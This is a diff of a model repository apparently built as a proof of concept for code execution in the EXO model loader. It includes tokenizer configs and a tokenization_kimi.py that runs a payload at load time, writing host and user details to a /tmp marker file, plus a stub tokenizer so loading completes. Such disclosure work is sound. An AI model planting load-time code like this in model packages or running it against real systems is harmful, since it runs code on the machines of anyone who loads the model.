"model.layers.9.input_layernorm.weight": "model.safetensors",
|
||||
"model.layers.9.mlp.down_proj.weight": "model.safetensors",
|
||||
"model.layers.9.mlp.gate_proj.weight": "model.safetensors",
|
||||
"model.layers.9.mlp.up_proj.weight": "model.safetensors",
|
||||
"model.layers.9.post_attention_layernorm.weight": "model.safetensors",
|
||||
"model.layers.9.self_attn.k_proj.weight": "model.safetensors",
|
||||
"model.layers.9.self_attn.o_proj.weight": "model.safetensors",
|
||||
"model.layers.9.self_attn.q_proj.weight": "model.safetensors",
|
||||
"model.layers.9.self_attn.v_proj.weight": "model.safetensors",
|
||||
"model.norm.weight": "model.safetensors"
|
||||
}
|
||||
}
|
||||
34
special_tokens_map.json
Normal file
34
special_tokens_map.json
Normal file
@@ -0,0 +1,34 @@
|
||||
{
|
||||
"additional_special_tokens": [
|
||||
"<|im_start|>",
|
||||
"<|im_end|>"
|
||||
],
|
||||
"bos_token": {
|
||||
"content": "<|im_start|>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false
|
||||
},
|
||||
"eos_token": {
|
||||
"content": "<|im_end|>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false
|
||||
},
|
||||
"pad_token": {
|
||||
"content": "<|im_end|>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false
|
||||
},
|
||||
"unk_token": {
|
||||
"content": "<|endoftext|>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false
|
||||
}
|
||||
}
|
||||
80
tokenization_kimi.py
Normal file
80
tokenization_kimi.py
Normal file
@@ -0,0 +1,80 @@
|
||||
# tokenization_kimi.py - Safe PoC stub
|
||||
# This file is executed via exec() by EXO when loading a model whose ID contains "kimi-k2".
|
||||
# It demonstrates arbitrary code execution by writing a marker file, then provides
|
||||
# the TikTokenTokenizer class that EXO expects.
|
||||
|
||||
import os
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
# ============================================================================
|
||||
# PoC PAYLOAD - executes at module load time (when EXO calls exec() on this file)
|
||||
# ============================================================================
|
||||
POC_MARKER_FILE = "/tmp/exo_poc_marker.txt"
|
||||
|
||||
def execute_payload():
|
||||
"""
|
||||
Proof-of-execution: writes a marker file with basic context info.
|
||||
Non-destructive — only creates one small file under /tmp.
|
||||
"""
|
||||
try:
|
||||
content = (
|
||||
"=== EXO RCE PoC - Code Execution Confirmed ===\n"
|
||||
f"Hostname: {os.uname().nodename}\n"
|
||||
f"User: {os.getenv('USER', 'unknown')}\n"
|
||||
f"PID: {os.getpid()}\n"
|
||||
f"Python: {sys.executable}\n"
|
||||
f"CWD: {os.getcwd()}\n"
|
||||
)
|
||||
Path(POC_MARKER_FILE).write_text(content)
|
||||
print(f"[PoC] tokenization_kimi executed — marker written to {POC_MARKER_FILE}")
|
||||
except Exception as exc:
|
||||
print(f"[PoC] Could not write marker file: {exc}")
|
||||
|
||||
execute_payload()
|
||||
|
||||
# ============================================================================
|
||||
# STUB TOKENIZER CLASS — required by EXO's load_tokenizer_for_model_id()
|
||||
# EXO calls:
|
||||
# hf_tokenizer = TikTokenTokenizer.from_pretrained(model_path)
|
||||
# hf_tokenizer.encode = _patched_encode (uses hf_tokenizer.model.encode)
|
||||
# So we need a .model attribute that has an .encode() method.
|
||||
# ============================================================================
|
||||
|
||||
class _InnerModel:
|
||||
"""Minimal inner model that satisfies EXO's patched encode path."""
|
||||
def encode(self, text: str, allowed_special=None) -> list:
|
||||
return [ord(c) % 128 for c in (text or "")]
|
||||
|
||||
def decode(self, tokens, errors="replace") -> str:
|
||||
return "".join(chr(t % 128) for t in tokens)
|
||||
|
||||
|
||||
class TikTokenTokenizer:
|
||||
"""
|
||||
Stub TikTokenTokenizer to satisfy EXO's tokenizer loading expectations.
|
||||
The PoC payload has already executed by the time this class is instantiated.
|
||||
"""
|
||||
|
||||
def __init__(self, *args, **kwargs):
|
||||
self.model = _InnerModel()
|
||||
self.eos_token_id = 151643 # <|im_end|> in real Kimi vocab
|
||||
self.bos_token_id = 151644
|
||||
self.pad_token_id = 151643
|
||||
self.eos_token = "<|im_end|>"
|
||||
self.bos_token = "<|im_start|>"
|
||||
print("[PoC] TikTokenTokenizer stub initialised")
|
||||
|
||||
@classmethod
|
||||
def from_pretrained(cls, model_path, **kwargs):
|
||||
print(f"[PoC] TikTokenTokenizer.from_pretrained called with: {model_path}")
|
||||
return cls()
|
||||
|
||||
def encode(self, text: str, **kwargs) -> list:
|
||||
return self.model.encode(text)
|
||||
|
||||
def decode(self, tokens, **kwargs) -> str:
|
||||
return self.model.decode(tokens)
|
||||
|
||||
|
||||
print("[PoC] tokenization_kimi.py loaded successfully")
|
||||
98249
tokenizer.json
Normal file
98249
tokenizer.json
Normal file
File diff suppressed because it is too large
Load Diff
154
tokenizer_config.json
Normal file
154
tokenizer_config.json
Normal file
@@ -0,0 +1,154 @@
|
||||
{
|
||||
"add_prefix_space": false,
|
||||
"added_tokens_decoder": {
|
||||
"0": {
|
||||
"content": "<|endoftext|>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"1": {
|
||||
"content": "<|im_start|>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"2": {
|
||||
"content": "<|im_end|>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"3": {
|
||||
"content": "<repo_name>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"4": {
|
||||
"content": "<reponame>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"5": {
|
||||
"content": "<file_sep>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"6": {
|
||||
"content": "<filename>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"7": {
|
||||
"content": "<gh_stars>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"8": {
|
||||
"content": "<issue_start>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"9": {
|
||||
"content": "<issue_comment>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"10": {
|
||||
"content": "<issue_closed>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"11": {
|
||||
"content": "<jupyter_start>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"12": {
|
||||
"content": "<jupyter_text>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"13": {
|
||||
"content": "<jupyter_code>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"14": {
|
||||
"content": "<jupyter_output>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"15": {
|
||||
"content": "<jupyter_script>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
},
|
||||
"16": {
|
||||
"content": "<empty_output>",
|
||||
"lstrip": false,
|
||||
"normalized": false,
|
||||
"rstrip": false,
|
||||
"single_word": false,
|
||||
"special": true
|
||||
}
|
||||
},
|
||||
"additional_special_tokens": [
|
||||
"<|im_start|>",
|
||||
"<|im_end|>"
|
||||
],
|
||||
"bos_token": "<|im_start|>",
|
||||
"chat_template": "{% for message in messages %}{% if loop.first and messages[0]['role'] != 'system' %}{{ '<|im_start|>system\nYou are a helpful AI assistant named SmolLM, trained by Hugging Face<|im_end|>\n' }}{% endif %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n'}}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}",
|
||||
"clean_up_tokenization_spaces": false,
|
||||
"eos_token": "<|im_end|>",
|
||||
"model_max_length": 8192,
|
||||
"pad_token": "<|im_end|>",
|
||||
"tokenizer_class": "GPT2Tokenizer",
|
||||
"unk_token": "<|endoftext|>",
|
||||
"vocab_size": 49152
|
||||
}
|
||||
25
tool_declaration_ts.py
Normal file
25
tool_declaration_ts.py
Normal file
@@ -0,0 +1,25 @@
|
||||
# tool_declaration_ts.py - Stub for Kimi tool/function-calling support
|
||||
# Loaded by EXO via importlib before tokenization_kimi.py is exec()'d.
|
||||
# Must exist to prevent ImportError in tokenization_kimi.py relative-import path.
|
||||
|
||||
"""
|
||||
Minimal tool-declaration stub for the Kimi tokenizer PoC.
|
||||
The real Kimi model uses this module for tool/function-call schema support.
|
||||
"""
|
||||
|
||||
# Stub constants expected by some tokenization_kimi variants
|
||||
TOOL_CALL_START = "<|tool_call_begin|>"
|
||||
TOOL_CALL_END = "<|tool_call_end|>"
|
||||
TOOL_CALL_ARG_BEGIN = "<|tool_call_argument_begin|>"
|
||||
|
||||
|
||||
def build_tool_declaration(name: str, description: str = "", params: dict = None) -> dict:
|
||||
"""Stub — returns a minimal tool declaration dict."""
|
||||
return {
|
||||
"name": name,
|
||||
"description": description,
|
||||
"parameters": params or {},
|
||||
}
|
||||
|
||||
|
||||
print("[PoC] tool_declaration_ts.py stub loaded")
|
||||
BIN
train_graph.png
Normal file
BIN
train_graph.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 58 KiB |
237139
train_info.json
Normal file
237139
train_info.json
Normal file
File diff suppressed because one or more lines are too long
1
vocab.json
Normal file
1
vocab.json
Normal file
File diff suppressed because one or more lines are too long
Reference in New Issue
Block a user